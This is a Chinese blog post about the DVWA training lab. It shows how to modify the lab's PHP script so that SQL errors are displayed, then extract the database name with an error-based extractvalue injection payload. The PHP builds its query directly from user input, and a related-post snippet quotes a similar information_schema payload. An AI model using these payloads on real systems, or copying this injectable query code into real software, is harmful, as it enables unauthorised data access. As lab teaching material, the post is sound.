DVWA盲注之报错注入的存在问题

最新推荐文章于 2022-12-20 15:19:44 发布
最新推荐文章于 2022-12-20 15:19:44 发布
阅读量610 收藏 2
点赞数
分类专栏: # WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43939527/article/details/109650954
版权

DVWA盲注之报错注入

实验等级为LOW级别
在报错注入中,发现高版本的dvwa并不会跳转出报错内容
在这里插入图片描述
我们输入1’ 只会告诉我们这个参数不正确
此时我们使用报错函数也没有用,只能做出exist or missing的判断
但是我们发现只需要修改对应的脚本内容,即可实现报错函数的利用,顺利爆出数据
修改后的脚本如下:

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
	// Get input
	$id = $_GET[ 'id' ];

	// Check database
	$getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	//$result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors
      $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ) or die( '<pre>' .    ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
	// Get results
	$num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
	if( $num > 0 ) {
		// Feedback for end user
		$html .= '<pre>User ID exists in the database.</pre>';
	}
	else {
		// User wasn't found, so the page wasn't!
		header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

		// Feedback for end user
		$html .= '<pre>User ID is MISSING from the database.</pre>';
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

修改之后,我们就能够很快找到注入点
在这里插入图片描述

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

执行报错函数就能够爆出数据内容

1' and extractvalue(rand(),concat(0x3e,database()))#

在这里插入图片描述

桃子味奶茶
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA之SQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题
DVWA文件包含报错The PHP function allow_url_include is not enabled.的解决方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 8505
解决方法前言一、修改php配置文件二、重启mysql和apache服务 前言     打开File Inclusion,发现红色报错内容 The PHP function allow_url_include is not enabled.(PHP函数allow_url_include未启用)。 一、修改php配置文件     /etc/php/7.4/apache2/ 文件夹 cd /etc/php/7.4/apache2/
DVWA之sql注入——联合注入和报错注入
Williamanddog的博客
12-20 1808
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
【无标题】DVWA sql注入 报错问题
weixin_50339521的博客
08-25 784
dvwa中sql注入报错问题
如何解决DVWA靶场中返回的报错信息 “Illegal mix of collations for operation ‘UNION‘ ”
weixin_52328526的博客
04-09 4033
如何解决DVWA靶场中返回的报错信息 “Illegal mix of collations for operation ‘UNION’ ”? 遇到的报错: Illegal mix of collations for operation ‘UNION’ 解决办法: 在百度上搜索到是因为编码的问题,进一步搜索发现可以通过下载PhpMyAdmin来修改编码,具体步骤如下: 百度搜索PhpMyAdmin,到官网去下载它,下载完成后将压缩包解压缩到phpstudy的WWW目录下,然后就是对它进行配置,我配置的时
DVWA之sql注入漏洞-low
m0_63735735的博客
07-19 1645
DVWA之sql注入漏洞-low
DVWA下的SQL注入
07-25
SQL
十三、kali windows DVWA搭建及测试
最新发布
01-15
kali windows DVWA搭建及测试,本人亲测可用,如有问题可私信。 DVWA是OWASP官方编写的PHP网站,包含了各种网站常见漏洞,可以学习攻击及修复方式 PHP环境:WAMP(Windows Apache Mysql Php) DVWA源代码下载:...
dvwa+xampp搭建显示乱码的问题及解决方案
01-20
如图,dvwa显示乱码,解决办法有两个:   1、方法一是,临时解决办法,也就是每次都得手动修改:利用浏览器的编码修改   2、方法二是:永久方案,那就是修改dvwa的配置文件,修改默认编码,位置在(记得打开隐藏...
Sqlmap
mumuzi2的博客
02-25 386
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA学习之Weak Session IDs (弱会话IDs)
weixin_40950781的博客
08-21 7294
DVWA学习之Weak Session IDs(弱会话IDs)Weak Session IDs(弱会话IDs)0x01 何为Weak Session IDs0x02 low级别 Weak Session IDs(弱会话IDs) 0x01 何为Weak Session IDs 当用户登录后,在服务器就会创建一个会话(session),叫做会话控制,接着访问页面的时候就不用登录,只需要携带 Sesio...
DVWA低级别下的SQL盲注
qq_23667585的博客
11-04 989
通过二进制逻辑获取DVWA低级别下SQL盲注的用户名
DVWA问题2:Could not connect to the MySQL service.
热门推荐
烟敛寒林的博客
04-16 1万+
进入到DVWA页面中: 点击下图中按钮 Creat / Reset Database 创建数据库: 出现如下错误提示: Could not connect to the MySQL service. Please check the config file. 意思是: 无法连接到MySQL服务。 请检查你的config文件。 问题解决 此时我们找到config文...
在win10中搭建DVWA时,遇到403 - Forbidden 禁止访问,数据库创建失败及建立成功后登陆失败的解决办法。
Tractor2的博客
10-31 1万+
网安新手,在搭建DVWA靶场时遇到了403 - Forbidden 禁止访问的情况,如下图: 为此我找了一些大神写的资料,最终解决,方法
DVWA登录报错loginfailed
09-02 4320
打开phpstudy,启动Apache和mySQL 访问http://127.0.0.1/DVWA-master/之后会进入http://127.0.0.1/DVWA-master/login.php 账号密码:admin/password 但是这次死活登录不上,报错loginfailed 可能是端口占用问题? 用netstat -an查看当前端口开放状态,netstat -a...
搭建DVWA出现错误:DVWA System error - config file not found.
KylinKylin的专栏
08-06 5410
搭建时候出现错误:DVWA System error - config file not found. Copy config/config.inc.php.dist to config/config.inc.php and configure to your environment. 将config目录下的config.inc.php.dist文件更改为config.inc.php。 有的人会说:一进来就是这个文件后缀啊,怎么还是出现这个问题? 这是因为:你没有设置显示文件后缀,.dist后缀被
DVWA-SQL注入(全级别)
小纯的博客
02-08 6314
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 ...
DVWA之 SQL Injection(Blind)
谢公子的博客
08-05 2733
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
dvwa创建数据库报错
09-15
DVWA创建数据库报错可能是由于以下几个原因引起的。首先,检查DVWA的配置文件中的用户名和密码是否已更改为root,如果没有更改,可能会导致报错。其次,可能是由于本地安装的数据库与DVWA的密码冲突,需要修改本地...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值